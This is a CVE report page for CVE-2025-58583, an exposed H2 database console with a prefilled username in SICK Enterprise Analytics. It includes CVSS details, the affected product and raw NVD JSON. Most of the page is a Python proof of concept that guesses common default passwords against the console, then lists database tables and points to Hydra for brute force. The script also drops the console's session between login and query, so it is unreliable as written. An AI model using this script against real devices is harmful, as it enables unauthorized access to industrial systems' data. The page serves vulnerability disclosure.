Security Vulnerability Report
CVE-2025-58583 CVSS 5.3 MEDIUM

CVE-2025-58583

Published: 2025-10-06 07:15:35
Last Modified: 2026-01-27 16:14:45

Description

The application provides access to a login protected H2 database for caching purposes. The username is prefilled.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sick:enterprise_analytics:*:*:*:*:*:*:*:* - VULNERABLE
SICK products (for the specific models and version ranges, refer to the official SICK security advisory SCA-2025-0010)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-58583 PoC - SICK H2 Database Console Unauthorized Access
# This PoC demonstrates how to access the exposed H2 database console
import requests
from urllib.parse import urljoin

TARGET_URL = "http://target-sick-device:8082"

# Username is prefilled in the vulnerable application
KNOWN_USERNAME = "sa"  # H2 default username, may vary by SICK product configuration


def try_login(target_url, username, password):
    """Attempt to login to H2 database console"""
    login_url = urljoin(target_url, "/login.do")

    # H2 console login parameters
    data = {
        "language": "en",
        "setting": "Generic+H2+" + username,
        "name": username,
        "password": password,
        "session": "",
        "url": "jdbc:h2:./cache",
        "driver": "org.h2.Driver",
    }

    try:
        response = requests.post(login_url, data=data, timeout=10)
        if response.status_code == 200 and "login.jsp" not in response.url:
            print(f"[+] Login successful with password: {password}")
            return True
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


def execute_sql(target_url, sql_query):
    """Execute SQL query against the H2 database"""
    query_url = urljoin(target_url, "/query.do")
    params = {"sql": sql_query}

    try:
        response = requests.get(query_url, params=params, timeout=10)
        return response.text
    except Exception as e:
        print(f"[-] Error executing query: {e}")
        return None


def main():
    print(f"[*] Targeting: {TARGET_URL}")
    print(f"[*] Known username: {KNOWN_USERNAME}")

    # Common weak passwords to try
    weak_passwords = ["", "sa", "password", "admin", "123456", "h2", "cache"]

    for pwd in weak_passwords:
        if try_login(TARGET_URL, KNOWN_USERNAME, pwd):
            print("[+] Attempting to enumerate tables...")
            result = execute_sql(
                TARGET_URL,
                "SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='PUBLIC'",
            )
            print(f"[+] Tables: {result}")
            break
    else:
        # Runs only if the loop finished without a successful login
        print("[-] Could not login with common passwords")
        print("[*] Consider using brute-force tools like Hydra")


if __name__ == "__main__":
    main()
```

References

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-58583", "sourceIdentifier": "[email protected]", "published": "2025-10-06T07:15:34.890", "lastModified": "2026-01-27T16:14:44.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The application provides access to a login protected H2 database for caching purposes. The username is prefilled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sick:enterprise_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "04E8EA78-2780-40C0-B5BA-6CF99DE6355B"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}
```